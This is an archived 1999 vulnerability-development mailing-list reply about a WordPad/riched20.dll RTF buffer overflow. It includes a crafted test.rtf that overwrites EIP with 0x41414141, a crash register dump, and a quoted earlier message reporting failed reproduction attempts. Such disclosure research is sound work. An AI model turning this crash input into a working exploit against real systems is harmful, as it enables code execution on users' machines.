Vulnerability Development mailing list archives
Re: WordPad/riched20.dll buffer overflow
From: gas-mail () INAME COM (Gas)
Date: Mon, 22 Nov 1999 16:37:36 -0300
I could reproduce EIP=41414141 with this file: ------------test.rtf------------------- {\rtf1\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAbcdeansi\ansicpg1252\deff0\deflang11274{\fonttbl {\f0\fnil\fcharset0 Courier New;}} \uc1\pard\ulnone\f0\fs20\par } ------------end test.rtf--------------- And that's what i got: ---------------------------------------------------- WORDPAD provocó un error de página no válida en el módulo <desconocido> de 0000:41414141. Registros: EAX=00000102 CS=0177 EIP=41414141 EFLGS=00010206 EBX=0056e36c SS=017f ESP=0056e32c EBP=00002c0a ECX=0056e36c DS=017f ESI=0056e36c FS=419f EDX=fffffff3 ES=017f EDI=0056e420 GS=367e Bytes en CS:EIP: Volcado de pila: ,08x ,08x ,08x ,08x ,08x ,08x ,08x ,08x ,08x ,08x ,08x ,08x ,08x ,08x ,08x ,08x ---------------------------------------------------- -- Gas gas-mail () iname com ----- Original Message -----
From: Gerardo Richarte <core.lists.bugtraq () CORE-SDI COM> To: BUGTRAQ () SECURITYFOCUS COM <BUGTRAQ () SECURITYFOCUS COM> Sent: Jueves, 18 de Noviembre de 1999, 06:45 p.m. Subject: WordPad/riched20.dll buffer overflow
I've been trying to determine if it's exploitable, and couldn't reproduce what you described. I want to know if there is some other information I need to know... here is what I tried:
an rtf file with
{\rtf\AAAAAAAAA...} a lot of As (tryed 32,49,1000,2000,... 5000... 20000)
nothing happened until 5000, where I got a crash but not with EIP== 0x41414141 but with ESI==0x41414141 on a 'push [esi]'. ESI was copyed previously from the stack, but on the stack there where only 4 As here, 8 As there, a so... then on 10000 As I got a different crash, with EDI==0x41414141, but never got EIP==0x41414141.
Anyway, it MAY be exploitable, but doesn't look simple...
Then I tryed a differen aproach I got http://www.securityfocus.com, I used a real rtf file and appended the same amount (32,49,...) of As after the first '\', but got exactly the same results...
could anybody reproduce this bug?
richie
-- A390 1BBA 2C58 D679 5A71 - 86F9 404F 4B53 3944 C2D0 Research and Developemen - CoreLabs - Core SDI (Information Security) http://www.core-sdi.com
--- For a personal reply use gera () core-sdi com
<!-- attachment="test.rtf" --> <HR> <UL> <LI>application/msword attachment: test.rtf </UL>
Current thread:
- Re: WordPad/riched20.dll buffer overflow Michal Zalewski (Jul 17)
- Re: WordPad/riched20.dll buffer overflow Ussr Labs (Nov 26)
- <Possible follow-ups>
- Re: WordPad/riched20.dll buffer overflow Gas (Nov 22)